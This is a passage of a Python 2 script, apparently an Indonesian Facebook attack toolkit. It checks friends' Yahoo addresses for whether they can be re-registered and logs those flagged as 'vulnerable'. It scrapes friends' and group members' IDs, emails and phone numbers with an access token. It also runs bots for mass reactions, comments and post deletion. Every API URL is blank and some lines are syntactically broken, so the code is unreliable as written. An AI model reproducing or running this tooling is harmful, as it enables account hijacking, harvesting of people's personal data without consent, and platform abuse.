'\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + nama print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]' print 40 * '\x1b[1;97m\xe2\x95\x90' else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]' except KeyError: pass print '\n\x1b[1;91m[+] \x1b[1;97mSelesai' print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt' save.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_yahoo() def yahoolist(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m') try: total = open(files, 'r') mail = total.readlines() except IOError: print '\x1b[1;91m[!] File tidak ada' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_yahoo() mpsh = [] jml = 0 jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') save = open('MailVuln.txt', 'w') print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]' print mail = open(files, 'r').readlines() for pw in mail: mail = pw.replace('\n', '') jml += 1 mpsh.append(jml) yahoo = re.compile('@.*') otw = if '' in otw:'') br._factory.is_html = True br.select_form(nr=0) br['username'] = mail klik = br.submit().read() jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*') try: pek = except: print '\x1b[1;91m ' + mail continue if '"messages.ERROR_INVALID_USERNAME">' in pek: save.write(mail + '\n') print '\x1b[1;92m ' + mail else: print '\x1b[1;91m ' + mail print '\n\x1b[1;91m[+] \x1b[1;97mSelesai' print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt' save.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_yahoo() def grab(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;37;40m1. Ambil ID teman' print '\x1b[1;37;40m2. Ambil ID teman dari teman' print '\x1b[1;37;40m3. Ambil ID member GRUP' print '\x1b[1;37;40m4. Ambil Email teman' print '\x1b[1;37;40m5. Ambil Email teman dari teman' print '\x1b[1;37;40m6. Ambil No HP teman' print '\x1b[1;37;40m7. Ambil No HP teman dari teman' print '\x1b[1;31;40m0. Kembali' print grab_pilih() def grab_pilih(): cuih = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if cuih == '': print '\x1b[1;91m[!] Jangan kosong' grab_pilih() else: if cuih == '1': id_teman() else: if cuih == '2': idfrom_teman() else: if cuih == '3': id_member_grup() else: if cuih == '4': email() else: if cuih == '5': emailfrom_teman() else: if cuih == '6': nomor_hp() else: if cuih == '7': hpfrom_teman() else: if cuih == '0': menu_hack() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mTidak ada' grab_pilih() def id_teman(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' r = requests.get('' + toket) z = json.loads(r.text) save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') bz = open(save_id, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for ah in z['data']: idteman.append(ah['id']) bz.write(ah['id'] + '\n') print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + ah['name'] print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id'] print 40 * '\x1b[1;97m\xe2\x95\x90' print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idteman) print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + save_id bz.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Kesalahan saat membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except KeyError: os.remove(save_id) print '\x1b[1;91m[!] Kesalahan terjadi' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' keluar() def idfrom_teman(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m') try: jok = requests.get('' + idt + '?access_token=' + toket) op = json.loads(jok.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name'] except KeyError: print '\x1b[1;91m[!] Belum berteman' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() r = requests.get('' + idt + '?fields=friends.limit(5000)&access_token=' + toket) z = json.loads(r.text) save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') bz = open(save_idt, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for ah in z['friends']['data']: idfromteman.append(ah['id']) bz.write(ah['id'] + '\n') print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + ah['name'] print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id'] print 40 * '\x1b[1;97m\xe2\x95\x90' print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idfromteman) print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + save_idt bz.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Kesalahan saat membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' keluar() def id_member_grup(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ') try: r = requests.get('' + id + '&access_token=' + toket) asw = json.loads(r.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name'] except KeyError: print '\x1b[1;91m[!] Grup tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') b = open(simg, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' re = requests.get('' + id + '/members?fields=name,id&access_token=' + toket) s = json.loads(re.text) for i in s['data']: idmem.append(i['id']) b.write(i['id'] + '\n') print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + i['name'] print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id'] print 40 * '\x1b[1;97m\xe2\x95\x90' print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idmem) print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + simg b.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Kesalahan saat membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except KeyError: os.remove(simg) print '\x1b[1;91m[!] Grup tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' keluar() def email(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') r = requests.get('' + toket) a = json.loads(r.text) mpsh = open(mails, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for i in a['data']: x = requests.get('' + i['id'] + '?access_token=' + toket) z = json.loads(x.text) try: em.append(z['email']) mpsh.write(z['email'] + '\n') print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email'] print 40 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Email\x1b[1;96m%s' % len(em) print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + mails mpsh.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Kesalahan saat membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except KeyError: os.remove(mails) print '\x1b[1;91m[!] Kesalahan terjadi' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' keluar() def emailfrom_teman(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m') try: jok = requests.get('' + idt + '?access_token=' + toket) op = json.loads(jok.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name'] except KeyError: print '\x1b[1;91m[!] Belum berteman' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') r = requests.get('' + idt + '/friends?access_token=' + toket) a = json.loads(r.text) mpsh = open(mails, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for i in a['data']: x = requests.get('' + i['id'] + '?access_token=' + toket) z = json.loads(x.text) try: emfromteman.append(z['email']) mpsh.write(z['email'] + '\n') print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email'] print 40 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Email\x1b[1;96m%s' % len(emfromteman) print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + mails mpsh.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Kesalahan saat membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' keluar() def nomor_hp(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') url = '' + toket r = requests.get(url) z = json.loads(r.text) no = open(noms, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for n in z['data']: x = requests.get('' + n['id'] + '?access_token=' + toket) z = json.loads(x.text) try: hp.append(z['mobile_phone']) no.write(z['mobile_phone'] + '\n') print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mNomor\x1b[1;91m : \x1b[1;97m' + z['mobile_phone'] print 40 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Nomor\x1b[1;96m%s' % len(hp) print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + noms no.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Kesalahan saat membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except KeyError: os.remove(noms) print '\x1b[1;91m[!] Kesalahan terjadi' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' keluar() def hpfrom_teman(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m') try: jok = requests.get('' + idt + '?access_token=' + toket) op = json.loads(jok.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name'] except KeyError: print '\x1b[1;91m[!] Belum berteman' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') r = requests.get('' + idt + '/friends?access_token=' + toket) a = json.loads(r.text) no = open(noms, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for i in a['data']: x = requests.get('' + i['id'] + '?access_token=' + toket) z = json.loads(x.text) try: hpfromteman.append(z['mobile_phone']) no.write(z['mobile_phone'] + '\n') print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mNomor\x1b[1;91m : \x1b[1;97m' + z['mobile_phone'] print 40 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Nomor\x1b[1;96m%s' % len(hpfromteman) print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + noms no.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Kesalahan saat membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' keluar() def menu_bot(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;37;40m1. Bot Reactions Target Post' print '\x1b[1;37;40m2. Bot Reactions Grup Post' print '\x1b[1;37;40m3. Bot Komen Target Post' print '\x1b[1;37;40m4. Bot Komen Grup Post' print '\x1b[1;37;40m5. Mass delete Post' print '\x1b[1;37;40m6. Terima permintaan pertemanan' print '\x1b[1;37;40m7. Hapus pertemanan' print '\x1b[1;31;40m0. Kembali' print bot_pilih() def bot_pilih(): bots = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if bots == '': print '\x1b[1;91m[!] Jangan kosong' bot_pilih() else: if bots == '1': menu_react() else: if bots == '2': grup_react() else: if bots == '3': bot_komen() else: if bots == '4': grup_komen() else: if bots == '5': deletepost() else: if bots == '6': accept() else: if bots == '7': unfriend() else: if bots == '0': menu() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mTidak ada' bot_pilih() def menu_react(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;37;40m1. \x1b[1;97mLike' print '\x1b[1;37;40m2. \x1b[1;97mLove' print '\x1b[1;37;40m3. \x1b[1;97mWow' print '\x1b[1;37;40m4. \x1b[1;97mHaha' print '\x1b[1;37;40m5. \x1b[1;97mSedih' print '\x1b[1;37;40m6. \x1b[1;97mMarah' print '\x1b[1;31;40m0. Kembali' print react_pilih() def react_pilih(): global tipe aksi = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if aksi == '': print '\x1b[1;91m[!] Jangan kosong' react_pilih() else: if aksi == '1': tipe = 'LIKE' react() else: if aksi == '2': tipe = 'LOVE' react() else: if aksi == '3': tipe = 'WOW' react() else: if aksi == '4': tipe = 'HAHA' react() else: if aksi == '5': tipe = 'SAD' react() else: if aksi == '6': tipe = 'ANGRY' react() else: if aksi == '0': menu_bot() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mTidak ada' react_pilih() def react(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ') limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') try: oh = requests.get('' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket) ah = json.loads(oh.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for a in ah['feed']['data']: y = a['id'] reaksi.append(y)'' + y + '/reactions?type=' + tipe + '&access_token=' + toket) print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe print print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(reaksi)) raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() except KeyError: print '\x1b[1;91m[!] ID Tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() def grup_react(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;37;40m1. \x1b[1;97mLike' print '\x1b[1;37;40m2. \x1b[1;97mLove' print '\x1b[1;37;40m3. \x1b[1;97mWow' print '\x1b[1;37;40m4. \x1b[1;97mHaha' print '\x1b[1;37;40m5. \x1b[1;97mSedih' print '\x1b[1;37;40m6. \x1b[1;97mMarah' print '\x1b[1;31;40m0. Kembali' print reactg_pilih() def reactg_pilih(): global tipe aksi = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if aksi == '': print '\x1b[1;91m[!] Jangan kosong' reactg_pilih() else: if aksi == '1': tipe = 'LIKE' reactg() else: if aksi == '2': tipe = 'LOVE' reactg() else: if aksi == '3': tipe = 'WOW' reactg() else: if aksi == '4': tipe = 'HAHA' reactg() else: if aksi == '5': tipe = 'SAD' reactg() else: if aksi == '6': tipe = 'ANGRY' reactg() else: if aksi == '0': menu_bot() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mTidak ada' reactg_pilih() def reactg(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ') limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') ah = requests.get('' + ide + '&access_token=' + toket) asw = json.loads(ah.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name'] try: oh = requests.get('' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket) ah = json.loads(oh.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for a in ah['feed']['data']: y = a['id'] reaksigrup.append(y)'' + y + '/reactions?type=' + tipe + '&access_token=' + toket) print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe print print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(reaksigrup)) raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() except KeyError: print '\x1b[1;91m[!] ID Tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() def bot_komen(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru" ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ') km = raw_input('\x1b[1;91m[+] \x1b[1;92mKomentar \x1b[1;91m:\x1b[1;97m ') limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') km = km.replace('<>', '\n') try: p = requests.get('' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket) a = json.loads(p.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for s in a['feed']['data']: f = s['id'] komen.append(f)'' + f + '/comments?message=' + km + '&access_token=' + toket) print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]' print print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(komen)) raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() except KeyError: print '\x1b[1;91m[!] ID Tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() def grup_komen(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru" ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ') km = raw_input('\x1b[1;91m[+] \x1b[1;92mKomentar \x1b[1;91m:\x1b[1;97m ') limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') km = km.replace('<>', '\n') try: ah = requests.get('' + ide + '&access_token=' + toket) asw = json.loads(ah.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name'] p = requests.get('' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket) a = json.loads(p.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for s in a['feed']['data']: f = s['id'] komengrup.append(f)'' + f + '/comments?message=' + km + '&access_token=' + toket) print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]' print print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(komengrup)) raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() except KeyError: print '\x1b[1;91m[!] ID Tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() def deletepost(): os.system('reset') try: toket = open('login.txt', 'r').read() nam = requests.get('' + toket) lol = json.loads(nam.text) nama = lol['name'] except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama jalan('\x1b[1;91m[+] \x1b[1;92mMulai menghapus postingan unfaedah\x1b[1;97m ...') print 40 * '\x1b[1;97m\xe2\x95\x90' asu = requests.get('' + toket) asus = json.loads(asu.text) for p in asus['data']: id = p['id'] piro = 0 url = requests.get('' + id + '?method=delete&access_token=' + toket) ok = json.loads(url.text) try: error = ok['error']['message'] print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mGagal' except TypeError: print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mTerhapus' piro += 1 except requests.exceptions.ConnectionError: print '\x1b[1;91m[!] Koneksi Error' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() print '\n\x1b[1;91m[+] 